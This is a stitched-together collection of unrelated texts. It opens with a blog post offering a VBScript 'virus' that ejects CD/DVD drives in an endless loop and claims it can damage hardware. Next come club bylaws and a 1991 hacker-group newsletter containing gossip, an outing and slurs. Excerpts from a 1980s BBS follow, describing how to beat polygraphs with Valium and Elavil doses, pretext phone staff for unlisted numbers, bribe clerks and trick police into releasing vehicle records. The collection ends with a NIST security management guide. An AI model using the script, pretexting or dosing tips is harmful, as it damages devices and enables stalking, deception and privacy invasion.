Virus That Ejects your CD/Dvd Drive Again and Again.

Try at your own risk. I am not responsible for your own deeds. For educational purpose only.

In this blog i will show you how to create a Virus That Ejects your CD/Dvd Drive Again and Again.. Its not a prank… This Can Damage your CD/Dvd Drive…

Here is the code:

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Write this code in notepad and save it as anything.vbs
Virus created. Now you just need to click it and Enjoy….

TAG FILE: Obscene Phobia BBS (January 1, 1995)

[Note: OCF is the Open Computing Facility at UC Berkeley.]

Bylaws of the OCF.

1. The General Manager and the Site Managers cannot
appoint directors except when the OCF is not in session
and the Board of Directors cannot make a quorum because
there are fewer than five directors in town.

2. The OCF Board of Directors shall meet weekly.

3. Any Director missing two consecutive regularly
scheduled meetings will be removed from the Board,
regardless of whether the meetings achieve quorum.

4. OCF Board meetings must be announced to all Directors
at least twenty-four hours in advance.

5. Resolutions by the Board of Directors can be put to a
vote electronically. When putting a resolution to the
Board in this manner, all Board members must be
included in the request for votes. To pass an issue
this way, at least half of all the Board members must
agree. If the motion fails to achieve a majority
within seventy-two hours of being called to such a
vote, the motion fails. The results of the vote will
be posted in role call form.

6. Attendance lists and minutes for all OCF meetings shall
be maintained for the decisions of that meeting to be
valid.

May 28, 1991

The Book of MOD: Part 5: Who are They And Where Did They Come From? (Summer 1991)

MODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmod!
===============================================================================

MOD.book.FIVE: Who are they and where did they come from?
————-

Well, it’s time again for another journal. It’s now the
middle of summer 1991. Lately we’ve heard a few good stories
out of the mouths of people we don’t even know. There have
even been a few funny occurances in the past few weeks.

1) There are rumours that Phiber Optik was wasting his life
away and not using his talents wisely. Well, the truth of
the matter is, he has been a speaker in many public debates
and conferences on hacking in general and computer security.
He is also working as a programmer/developer for a computer
firm in NYC. Also, he is working closely with the EFF (which
recently have set up their own system for their organization).

2) COMSEC is formed. The *new* LOD (whose only member
consists of Erik Bloodaxe) goes into the computer security
business. Nothing to date is documented on their services and
we have yet to see what the hell they can provide. EBA for
one is an original member and he knows close to nothing
(except for the things that he asked Phiber Optik to tell
him). Not to mention these guys are hardly corporate and have
NO experience in the business end of computer security; which
explains why they got caught misrepresenting themselves as
Landmark Graphics to other well-established computer security
firms. Also, they have bragged about narking on a few members
of MOD in their jealous rage. This we can prove through
insiders.

MOD was never a textfile “how-to” group. It was always based
on a brotherhood type deal and everything done is secretive
and has a purpose behind it. LOD on the other hand, never
made sense to any of us anymore. It was good at first, when
all the original (knowledgable) members were active, but
lately it’s become to be known as a group of guys with
very sparce telecom knowledge riding on a name that once
actually stood for something.

Even Phiber Optik questioned whether LOD meant Legion of Doom
or Lump of Doo-doo (on Gyrotechnic’s private bbs). He stood
firm against all the other members on the system until finally
they were dumbfounded and speechless. Well, the board died.
Now, PO and the rest of the MOD bunch take to them like a
swatter to flies. Give it up fellas.. it’ll never work.

3) Renegade Hacker (a NYC local) thinks he’s cool. He gets
raided, starts talking, and when confronted by MOD, hides
behind mommy. Then he says he hates MOD (which is funny since
he was sweating MOD’s nuts since the day he first got a modem;
those who were at the 2600 know what I mean..) The fact
remains he is a real loser out to make a name for himself by
trying to inspire those who have less contact with the better
hackers in the community.

NASTY (his group) = BIG Joke.
(they write files..the National Enquirer of the h/p world)

*Rent-A-Gay Hacker changed his phone #.. please note the new
one in the database.*

4) Lord Micro gets Xenix and creates what will be modnet 2.
(The Wing is the administrator of #1 in PA) Crazy Eddie
plans to put up a bbs (open forum) in the 2600 Magazine
format (like OSUNY, Central Office, The Toll Center).
NO illegal shit…just theoretical discussion..what real
hackers are made of.

5) Vinny (The Technician) is “outed”. He is an admitted
homosexual. I’m telling you.. watch out for these SSWC
guys..they’re a little funny, ya know?

6) Mind Rape, or something like that, of NSA is a new pest.
Gimme a break. When will they ever learn? Infiniti was
another one, but I guess he’s kept quiet..which is good.
Let’s just hope he doesn’t ask Mind Dweeb for help. Add
Purple “no-show” Mustard (codez kid..see MOD/database for more
info) to this catagory. Also, there’s another guy using
Acid’s handle in 216. Wasn’t home when we called twice.

Special thanks to Jack Hitt and Paul Tough of Harper’s Magazine.
Great guys, good writers/editors.. damn that stuff was fun.

Hello to State Police Officer Donald Delaney. Not such a bad guy,
just that he IS a cop and he DID bust some of us. But he also got
those guys pirating cellular service in Queens, which really was a
major bust. Nice tie.

===================
= Another MOD.duh =
= file.. = “More eLiTenezz in one pinky
= = than 2 cans of LOD!”
= All replies can =
= be sent to: =
= =
= MOD@modnet.UUCP =
===================
-> kill r0dentz!!!

eof.MOD.book.5

How to Get Anything on Anyone Excerpts

>———————-
(taken from the book How To Get ANYTHING ON ANYBODY)
By Lee Lapin

rewritten by Woman Watcher for P-80
———————————–

1) NEVER COP OUT. This should be obvious, yet it is one of the most
frequent method of identifying liars. Remember, the applicant has
nothing to lose by lying, except being branded a liar.

2) BE CONFIDENT. Two items were significantly related to being a better
or worse, within the questions asked at each office. Quite simply, the
better the liars SAID they were good liars. Also, the better liars said
they expected to beat the the polygraph. The worse liars were not sure,
or did not expect to beat it. No other conceptions about lying,
ambivalence, years of undercover work, etc., had any effect on the
ability to lie.

3) LIE OFTEN. Out of the people who told five or six lies on the test,
eight were among the best liars and one was in the worse group. Of
people who told four or less, three were better, and 12 were in the
worse group. One concludes that the more lies one tells, the greater
chance of being a better liar.

4) DRUGS. The best drug seems to be VALIUM(a preparation of diazepam
marketed by Roche). It is the number one prescribed drug in the country
and it is easy to get, legally and illegally. The prime dosage seems to
be 10 milligrams on an empty stomach. The second drug is ELAVIL (Amatry-
ptilene, made by MSD). Subjects took 50-75 milligrams and were able to
pass lies.

5) good ol’ TACK IN THE SHOE. This did not work as well as the drugs but
one subject used is on all questions including the control questions.
He was found to have a ‘strong guilt complex’ and was judged unsuitable
for testing.

……………………………………………………………….
How to Beat any Stress Analyzer
——————————-

Unlike the lie detector(polygraph) there is a very simple way to
invalidate and PSE(Psychological Stress Evaluator) or stress analyzer
test:

Drop your voice down to a fairly low register and say the stall-
syllable, “ahhhhh”, as if someone has asked if you have cheated on your
wife…

“Ahhhhhhhhhh,well,ahhhhhhhhhh,noooooooo…Not exactly..”

The “ahhhh” in a non-modulated tone. IT WILL LIGHT UP THE RED LEDS like
a christmas tree.(making the test invalid). Try speaking in the same
manner, a low, steady raspy growl from the back of your throat..

The machine wil now indicate everything you say as a lie…
VALIUM works well for this one also..as it calms you down..BOOZE also
works, though not as well as valium.

Next time you talk to an insurance adjuster over the phone and he wants
to record your call, you might remember these tips…
-Woman Watcher

DOWNLOADED FROM P-80 SYSTEMS…..

How to Get Anything on Anyone Excerpts

()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()

| How to get anything on anyone | Part 1 |

()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()

|–>By Toxic Tunic<--| | -------------- | |=-|-=---PHP----=-|-=| |__/ \__| | | | | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | PHREE WORLD ELITE BBS | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Every city has one or more offices dedicated to assigning numbers to the telephone wire pairs. These offices are called DPAC offices and are available to service Reps who are installing or repairing phones. To get the DPAC number, a service rep would call the old stand-by, customer service number for billing information in the town the number the phone is located in that he is trying to get the unlisted number of.. Okay? The conversation would go like this, 'Hi, San Fran this is Joe from San Mateo Business office. I need your DPAC number for the south end of town.' The information is usually passed out with no hassle, if the first person does not have it or is not helpful, try one from a different prefix in the same city. The 'rep' would then call DPAC (note; he would have the listing info from his own district; again he is calling from a nearby town). ''Hi, Dee-Pac this is Joe from San Mateo Phone Store, I need the listing for 812 First Street.'' The San Francisco will then give the number at the address requested. There is no notation at DPAC if the number is listed or unlisted. The DPAC number for S.F. is, last time it was checked, (415) 774-8924.... Call Collect... This file typed by TOXIC TUNIC from the book ''How to Get Anything on Anybody,'' by Lee Lapin. Buy it. =============================================================================== +----------------------------------------------------------------------------+ ! ! ! HOW TO GET ANYTHING ON ANYBODY, PART II ! ! ! ! ROCK DIGGING; THE ART OF TURNING OUT FACTS ! ! ! +----------------------------------------------------------------------------+ DIGGING Without a doubt the number one, very most important thing an investigator can know is WHERE TO FIND INFORMATION. Out there in the jungle are books, libraries, computers, newspapers, and civil servants, all justifying their existence by collecting and storing data on YOU, and unfortunately, me... One can prepare a dossier on almost any person, or company, by simply under- standing the system, and knowing where and how to dig. The finished product will be so complete it will scare you. A background investigation done in this fashion will contain things the target himself had forgotten, along with things neither his mother nor wife ever knew... The following list is the most complete collection myself and a number of experts in the field could come up with. Most of the sources listed are publicly, or semi-publicly available. Some are considered closed. In dealing with any set of records under the control of a living person there is no such thing as a closed source. Some simply necessitate a different plan of attack. Civil servants, city hall record keepers and such, are often bendable by the correct use of flattery and involving them in an ''important investigation'' to find the real father of Susie before she succumbs to the cancer... Bribes are often an acceptable alternative. The key here is to determine who actually needs to be bribed. Never go for the head of a department if a low- paid clerk has physical control of the materials... Many of these sources can be found at a large library, or private collection. Rarely does one have to buy expensive directories. When applicable I have included source suggestions. GOOD HUNTING! TELEPHONE DIRECTORIES --- Most Americans are listed in a phone directory somewhere. You can find major and many minor directories at big city librar- ies. The phone company will also give you, free of charge, any directory you ask for, if it is for business purposes. REVERSE DIRECTORIES --- This particular edition lists the number, 771-3082, followed by the owner, Jones, Jim, and address, 69 Peyton Place. Same sources as the other directories. PRIVATE TELCO INFORMATION --- Every phone company has a list of their unpublished numbers, along with long distance call records, credit applications, where else the target has had a telephone and any additional listings or references he used on his original application. This information comes under the control of the telco's Chief Special Agent. He is in charge of hunting down nasties who defraud the phone company in one way or another and is probably an ex-cop or federal agent. He usually cooperate with legitimate police agencies and may help along a PI or other person with a cause. In smaller phone companies, or outlying districts the Chief Operator will have access to this information. Good people to make friends with....... UNLISTED NUMBERS --- There is no legal way to get an unlisted/unpublished number. There are a couple of other ways. [see part I] The phone company puts out a small book of all unlisted numbers in their area. A phone person can sometimes be bribed to sell a copy of this book. If the number is actually unlisted a good private detective will have sources for it or follow my technique. [This was an excerpt from ''How to Get Anything on Anybody,'' by Lee Lapin. It's a good book. Buy copies for all your friends.] [MORE NEXT PHILE...] XXXXX XXXXX X X XXXXX XXXXX XXXXX X X XXXX XXXXX XXXXX X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X XXXXX X X XXXXX XXXXX X XXXXX X X XXXXX XXXXX +----------------------------------------------------- ____ __ __ __ ______ / __ \ / / / / / / / ____/ / / / / / / / / / / / / / /_/ / / / / / / / / /__ / ____/ / / / / / / / ___/ / / / /_/ /_/ / / /____ /_/hree \___/\___/orld /______/lite (916) 689-6241 24 Hours/7 Days SysOp: Dark Creaper Co-Sysop: ShAdOwRuNnEr +--------------------------------+ ! HOW TO GET ANYTHING ON ANYBODY ! ! PART III ! ! ! ! MORE INFO-GATHERING... ! +--------------------------------+ CROSS DIRECTORY --- Each local phone company publishes a cross directory. This book lists every address in the district by street and then gives the occupants' name and telephone number. It DOES NOT list unlisted/unpublished numbers. The directory is normally updated every couple of months and is rented on a subscription basis. Many local libraries will have a copy. Most collection agents, some answering services and many news departments of radio and television stations will have a copy you can borrow for a moment. This directory is invaluable when tracking someone. If you can't find their number you can at least call their ex-neighbors with a nice story and come up with some information... CITY DIRECTORIES --- Since the 1800's R.L. Polk Company of Taylor, Michigan has published city directories for most cities in the US. Sometime later they were joined by Cole's Householder Directors, Lincoln Nebraska. These directories are NOT based on telco information, but are compiled by having some $3.00 an hour ''investigator'' walk from house to house asking who lives there, how many in the family, the phone number, etc. If they miss anyone they leave a mail form. Many people who would not list their phone numbers, or don't have a phone in their name, will obligingly fill out these snoop forms because of the accompanying propaganda about how important the information is... Most libraries will have at least one of the directories for their area, phone companies will list the local office of the directory compilers. Collection agencies and news departments will have a copy of the directory. CERTIFICATES OF EXISTENCE --- The government loves you. To prove that they are constantly collecting data to verify that you exist... BIRTH CERTIFICATE --- Name of child, eye color, name of father, mother's maiden name, date and place of birth, father's occupation, if couple not married at birth, name of doctor who delivered. MARRIAGE CERTIFICATES --- Name and place of birth for the man and woman, her maiden name, man's occupation, status of any previous marriages, birth dates and places, blood type. DEATH CERTIFICATES --- Date and cause of death, doctor who signed the certificate, residence and occupation, SS number, military record, birth date and place, cemetery and funeral home names [whatever turns you on...]. DMV --- The Department of Motor Vehicles is a natural source for important data; in some states a call will give you the info sought, in some one mails a license number and a small fee (around $1.00) to the DMV and they will return the favor with owner info, and in some states they will not give out any details to anyone but the cops. One approach to this problem is to go thru the cops (I was hitchhiking and left something in this car, the license number is...). SCHOOLS --- A cumulative file is kept on every student from kindergarten thru PH.D. by the school involved. This file will include such things as parents, addresses, grades, IQ, receiving and forwarding addresses. [This has been yet another boring excerpt from ''How to Get Anything on Anybody.'' Buy it, or I'll find you and throw rocks and garbage at you.] ----> t o x i c

t u n i c <---- March 1986. ____ __ __ __ ______ / __ \ / / / / / / / ____/ / / / / / / / / / / / / / /_/ / / / / / / / / /__ / ____/ / / / / / / / ___/ / / / /_/ /_/ / / /____ /_/hree \___/\___/orld /______/lite (916) 689-6241 24 Hours/7 Days SysOp: Dark Creaper Co-Sysop: ShAdOwRuNnEr DOWNLOADED FROM P-80 SYSTEMS........ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������

The NIST Management Guide to the Protection of Information Resources

Management Guide to the Protection of Information
Resources

National Institute of Standards and Technology
The National Institute of Standards and Technology (NIST), is
responsible for developing standards, providing technical
assistance, and conducting research for computers and related
systems. These activities provide technical support to
government and industry in the effective, safe, and
economical use of computers. With the passage of the Computer
Security Act of 1987 (P.L. 100-235), NIST’s activities also
include the development of standards and guidelines needed to
assure the cost-effective security and privacy of sensitive
information in Federal computer systems. This guide represents
one activity towards the protection and management of sensitive
information resources.

Acknowledgments
This guide was written by Cheryl Helsing of Deloitte, Haskins &
Sells in conjunction with Marianne Swanson and Mary Anne Todd,
National Institute of Standards and Technology.

Executive Summary
Today computers are integral to all aspects of operations within
an organization. As Federal agencies are becoming critically
dependent upon computer information systems to carry out their
missions, the agency executives (policy makers) are recognizing
that computers and computer-related problems must be understood
and managed, the same as any other resource. They are beginning
to understand the importance of setting policies, goals, and
standards for protection of data, information, and computer
resources, and are committing resources for information security
programs. They are also learning that primary responsibility for
data security must rest with the managers of the functional areas
supported by the data.

All managers who use any type of automated information resource
system must become familiar with their agency’s policies and
procedures for protecting the information which is processed and
stored within them. Adequately secure systems deter, prevent, or
detect unauthorized disclosure, modification, or use of
information. Agency information requires protection from
intruders, as well as from employees with authorized computer
access privileges who attempt to perform unauthorized actions.
Protection is achieved not only by technical, physical and
personnel safeguards, but also by clearly articulating and
implementing agency policy regarding authorized system use to
information users and processing personnel at all levels. This
guide is one of three brochures that have been designed for a
specific audience. The “Executive Guide to the Protection of
Information Resources” and the “Computer User’s Guide to the
Protection of Information Resources” complete the series.

Table of Contents

Executive Summary iv
Introduction 1
Purpose of Guide 1
The Risks 1
Responsibilities 2
Information Systems Development 5
Control Decisions 5
Security Principles 5
Access Decisions 7
Systems Development Process 7
Computer Facility Management 9
Physical Security 9
Data Security 11
Monitoring and Review 11
Personnel Management 13
Personnel Security 13
Training 14
For Additional Information 15

Introduction

Purpose of this Guide
This guide introduces information systems security concerns and
outlines the issues that must be addressed by all agency managers
in meeting their responsibilities to protect information systems
within their organizations. It describes essential components of
an effective information resource protection process that applies
to a stand alone personal computer or to a large data processing
facility.

The Risks
Effort is required by every Federal agency to safeguard
information resources and to reduce risks to a prudent level.
The spread of computing power to individual employees via
personal computers, local-area networks, and distributed
processing has drastically changed the way we manage and control
information resources. Internal controls and control points that
were present in the past when we were dealing with manual or
batch processes have not been established in many of today’s
automated systems. Reliance upon inadequately controlled computer
systems can have serious consequences, including:

Inability or impairment of the agency’s ability to perform its
mission

Inability to provide needed services to the public

Waste, loss, misuse, or misappropriation of funds

Loss of credibility or embarrassment to an agency

To avoid these consequences, a broad set of information security
issues must be effectively and comprehensively addressed.
Responsibilities
All functional managers have a responsibility to implement the
policies and goals established by executive management for
protection of automated information resources (data, processes,
facilities, equipment, personnel, and information). Managers in
all areas of an organization are clearly accountable for the
protection of any of these resources assigned to them to enable
them to perform their duties. They are responsible for
developing, administering, monitoring, and enforcing internal
controls, including security controls, within their assigned
areas of authority. Each manager’s specific responsibilities will
vary, depending on the role that manager has with regard to
computer systems.

Portions of this document provide more detailed information on
the respective security responsibilities of managers of computer
resources, managers responsible for information systems
applications and the personnel security issues involved.
However, all agency management must strive to:

Achieve Cost-Effective Security
The dollars spent for security measures to control or contain
losses should never be more than the projected dollar loss if
something adverse happened to the information resource.
Cost-effective security results when reduction in risk through
implementation of safeguards is balanced with costs. The greater
the value of information processed, or the more severe the
consequences if something happens to it, the greater the need
for control measures to protect it.
The person who can best determine the value or importance of
data is the functional manager who is responsible for the data.
For example, the manager responsible for the agency’s budget
program is the one who should establish requirements for the
protection of the automated data which supports the program. This
manager knows better than anyone else in the organization what
the impact will be if the data is inaccurate or unavailable.
Additionally, this manager usually is the supervisor of most of
the users of the data.

It is important that these trade-offs of cost versus risk
reduction be explicitly considered, and that management
understand the degree of risk remaining after selected controls
are implemented.

Assure Operational Continuity
With ever-increasing demands for timely information and greater
volumes of information being processed, the threat of information
system disruption is a very serious one. In some cases,
interruptions of only a few hours are unacceptable. The impact
due to inability to process data should be assessed, and actions
should be taken to assure availability of those systems
considered essential to agency operation. Functional management
must identify critical computer applications and develop
contingency plans so that the probability of loss of data
processing and telecommunications support is minimized.

Maintain Integrity
Integrity of information means you can trust the data and the
processes that manipulate it. Not only does this mean that errors
and omissions are minimized, but also that the information system
is protected from deliberate actions to wrongfully change the
data. Information can be said to have integrity when it
corresponds to the expectations and assumptions of the users.

Assure Confidentiality
Confidentiality of sensitive data is often, but not always, a
requirement of agency systems. Privacy requirements for personal
information is dictated by statute, while confidentiality of
other agency information is determined by the nature of that
information, e.g., information submitted by bidders in
procurement actions. The impact of wrongful disclosure must be
considered in understanding confidentiality requirements.

Comply with Applicable Laws and Regulations
As risks and vulnerabilities associated with information systems
become better understood, the body of law and regulations
compelling positive action to protect information resources
grows. OMB Circular No. A-130, “Management of Federal
Information Resources” and Public Law 100-235, “Computer Security
Act of 1987” are two documents where the knowledge of these
regulations and laws provide a baseline for an information
resource security program.

Information Systems Development
This section describes the protective measures that should be
included as part of the design and development of information
processing application systems. The functional manager that is
responsible for and will use the information contained in the
system, must ensure that security measures have been included and
are adequate. This includes applications designed for personal
computers as well as large mainframes.

Control Decisions
The official responsible for the agency function served by the
automated information system has a critical role in making
decisions regarding security and control. In the past, risk was
often unconsciously accepted when such individuals assumed the
computer facility operators were taking care of security. In
fact, there are decisions to be made and security elements to be
provided that cannot be delegated to the operator of the system.
In many cases, the user or manager develops the application and
operates solely.

The cost of control must be balanced with system efficiency and
usability issues. Risk must be evaluated and cost-effective
controls selected to provide a prudent level of control while
maximizing productivity. Controls are often closely connected
with the system function, and cannot be effectively designed
without significant understanding of the process being automated.

Security Principles
There are some common security attributes that should be present
in any system that processes valuable personal or sensitive
information. System designs should include mechanisms to enforce
the following security attributes.

Identification and Authentication of Users
Each user of a computer system should have a unique
identification on the system, such as an account number or other
user identification code. There must also be a means of verifying
that the individual claiming that identity (e.g., by typing in
that identifying code at a terminal) is really the authorized
individual and not an imposter. The most common means of
authentication is by a secret password, known only to the
authorized user.

Authorization Capability Enforcing the Principle of Least
Possible Privilege
Beyond ensuring that only authorized individuals can access the
system, it is also necessary to limit the users access to
information and transaction capabilities. Each person should be
limited to only the information and transaction authority that is
required by their job responsibilities. This concept, known as
the principle of least possible privilege, is a long-standing
control practice. There should be a way to easily assign each
user just the specific access authorities needed.

Individual Accountability
From both a control and legal point of view, it is necessary to
maintain records of the activities performed by each computer
user. The requirements for automated audit trails should be
developed when a system is designed. The information to be
recorded depends on what is significant about each particular
system. To be able to hold individuals accountable for their
actions, there must be a positive means of uniquely identifying
each computer user and a routinely maintained record of each
user’s activities.

Audit Mechanisms
Audit mechanisms detect unusual events and bring them to the
attention of management. This commonly occurs by violation
reporting or by an immediate warning to the computer system
operator. The type of alarm generated depends on the seriousness
of the event.

A common technique to detect access attempts by unauthorized
individuals is to count attempts. The security monitoring
functions of the system can automatically keep track of
unsuccessful attempts to gain access and generate an alarm if the
attempts reach an unacceptable number.

Performance Assurance
A basic design consideration for any information system should
be the ability to verify that the system is functioning as
intended. Systems that are developed without such design
considerations are often very difficult to independently audit or
review, leading to the possibility of unintended results or
inaccurate processing.

Recoverability
Because Federal agencies can potentially be heavily dependent on
a computer system, an important design consideration is the
ability to easily recover from troublesome events, whether minor
problems or major disruptions of the system. From a design point
of view, systems should be designed to easily recover from minor
problems, and to be either transportable to another backup
computer system or replaced by manual processes in case of major
disruption or loss of computer facility.

Access Decisions
Once the automated system is ready to use, decisions must be
made regarding access to the system and the information it
contains. For example, many individuals require the ability to
access and view data, but not the ability to change or delete
data. Even when computer systems have been designed to provide
the ability to narrowly designate access authorities, a
knowledgeable and responsible official must actually make those
access decisions. The care that is taken in this process is a
major determining factor of the level of security and control
present in the system. If sensitive data is being transmitted
over unprotected lines, it can be intercepted or passive
eavesdropping can occur. Encrypting the files will make the data
unintelligible and port protection devices will protect the files
from unauthorized access, if warranted.

Systems Development Process
All information systems software should be developed in a
controlled and systematic manner according to agency standards.
The quality and efficiency of the data processed, and the
possible reconfiguration of the system can all be affected by an
inadequate development process. The risk of security exposures
and vulnerabilities is greatly reduced when the systems
development process is itself controlled.

Computer Facility Management
Functional managers play a critical role in assuring that agency
information resources are appropriately safeguarded. This section
describes the protective measures that should be incorporated
into the ongoing management of information resource processing
facilities. As defined in OMB Circular No. A-130, “Management of
Federal Information Resources,” the term “information technology
facility” means an organizationally defined set of personnel,
hardware, software, and physical facilities, a primary function
of which is the operation of information technology. This
section, therefore applies to any manager who houses a personal
computer, mainframe or any other form of office system or
automated equipment.

Physical Security
Information cannot be appropriately protected unless the
facilities that house the equipment are properly protected from
physical threats and hazards. The major areas of concern are
described below.

Environmental Conditions
For many types of computer equipment, strict environmental
conditions must be maintained. Manufacturer’s specifications
should be observed for temperature, humidity, and electrical
power requirements.

Control of Media
The media upon which information is stored should be carefully
controlled. Transportable media such as tapes and cartridges
should be kept in secure locations, and accurate records kept of
the location and disposition of each. In addition, media from an
external source should be subject to a check-in process to ensure
it is from an authorized source.

Control of Physical Hazards
Each area should be surveyed for potential physical hazards.
Fire and water are two of the most damaging forces with regard to
computer systems. Opportunities for loss should be minimized by
an effective fire detection and suppression mechanism, and
planning reduces the danger of leaks or flooding. Other physical
controls include reducing the visibility of the equipment and
strictly limiting access to the area or equipment.

Contingency Planning
Although risks can be minimized, they cannot be eliminated. When
reliance upon a computer facility or application is substantial,
some type of contingency plan should be devised to allow critical
systems to be recovered following a major disaster, such as a
fire. There are a number of alternative approaches that should be
evaluated to most cost-effectively meet the agency’s need for
continuity of service.

Configuration Management
Risk can be introduced through unofficial and unauthorized
hardware or software. Another key component of information
resource management is ensuring only authorized hardware and
software are being utilized. There are several control issues to
be addressed.

Maintaining Accurate Records
Records of hardware/software inventories, configurations, and
locations should be maintained and kept up-to-date.

Complying with Terms of Software Licenses
Especially with microcomputer software, illegal copying and
other uses in conflict with licensing agreements are concerns.
The use of software subject to licensing agreements must be
monitored to ensure it is used according to the terms of the
agreement.

Protecting Against Malicious Software and Hardware
The recent occurrences of destructive computer “viruses” point
to the need to ensure that agencies do not allow unauthorized
software to be introduced to their computer environments.
Unauthorized hardware can also contain hidden vulnerabilities.
Management should adopt a strong policy against unauthorized
hardware/software, inform personnel about the risks and
consequences of unauthorized additions to computer systems, and
develop a monitoring process to detect violations of the policy.

Data Security
Management must ensure that appropriate security mechanisms are
in place that allow responsible officials to designate access to
data according to individual computer users’ specific needs.
Security mechanisms should be sufficient to implement individual
authentication of system users, allow authorization to specific
information and transaction authorities, maintain audit trails as
specified by the responsible official, and encrypt sensitive
files if required by user management.

Monitoring and Review
A final aspect of information resource protection to be
considered is the need for ongoing management monitoring and
review. To be effective, a security program must be a continuous
effort. Ideally, ongoing processes should be adapted to include
information protection checkpoints and reviews. Information
resource protection should be a key consideration in all major
computer system initiatives.

Earlier, the need for system audit trails was discussed. Those
audit trails are useful only if management regularly reviews
exception items or unusual activities. Irregularities should be
researched and action taken when merited. Similarly, all
information-related losses and incidents should be investigated.

A positive benefit of an effective monitoring process is an
increased understanding of the degree of information-related risk
in agency operations. Without an ongoing feedback process,
management may unknowingly accept too much risk. Prudent
decisions about trade-offs between efficiency and control can
only be made with a clear understanding of the degree of inherent
risk. Every manager should ask questions and periodically review
operations to judge whether changes in the environment have
introduced new risk, and to ensure that controls are working
effectively.

Personnel Management
Managers must be aware that information security is more a
people issue than a technical issue. Personnel are a vital link
in the protection of information resources, as information is
gathered by people, entered into information resource systems by
people, and ultimately used by people. Security issues should be
addressed with regard to:
People who use computer systems and store information in the
course of their normal job responsibilities
People who design, program, test, and implement critical or
sensitive systems
People who operate computer facilities that process critical or
sensitive data

Personnel Security
From the point of hire, individuals who will have routine access
to sensitive information resources should be subject to special
security procedures. More extensive background or reference
checks may be appropriate for such positions, and security
responsibilities should be explicitly covered in employee
orientations. Position descriptions and performance evaluations
should also explicitly reference unusual responsibilities
affecting the security of information resources.

Individuals in sensitive positions should be subject to job
rotation, and work flow should be designed in such a way as to
provide as much separation of sensitive functions as possible.
Upon decision to terminate or notice of resignation, expedited
termination or rotation to less sensitive duties for the
remainder of employment is a reasonable precaution.

Any Federal computer user who deliberately performs or attempts
to perform unauthorized activity should be subject to
disciplinary action, and such disciplinary action must be
uniformly applied throughout the agency. Any criminal activity
under Federal or state computer crime laws must be reported to
law enforcement authorities.

Training
Most information resource security problems involve people.
Problems can usually be identified in their earliest stages by
people who are attuned to the importance of information
protection issues. A strong training program will yield large
benefits in prevention and early detection of problems and
losses. To be most effective, training should be tailored to the
particular audience being addressed, e.g., executives and policy
makers; program and functional managers; IRM security and audit:
ADP management and operations; end users.

Most employees want to do the right thing, if agency
expectations are clearly communicated. Internal policies can be
enforced only if staff have been made aware of their individual
responsibilities. All personnel who access agency computer
systems should be aware of their responsibilities under agency
policy, as well as obligations under the law. Disciplinary
actions and legal penalties should be communicated.

For Additional Information

National Institute Of Standards and Technology
Computer Security Program Office, A-216 Technology
Gaithersburg, MD 20899
(301) 975-5200

For further information on the management of information
resources, NIST publishes Federal Information Processing
Standards Publications (FIBS PUBS). These publications deal with
many aspects of computer security, including password usage, data
encryption, ADP risk management and contingency planning, and
computer system security certification and accreditation. A list
of current publications is available from:
Standards Processing Coordinator (ADP)
National Computer Systems Laboratory
National Institute of Standards and Technology
Technology Building, B-64
Gaithersburg, MD 20899
Phone: (301) 975-2817
������������������������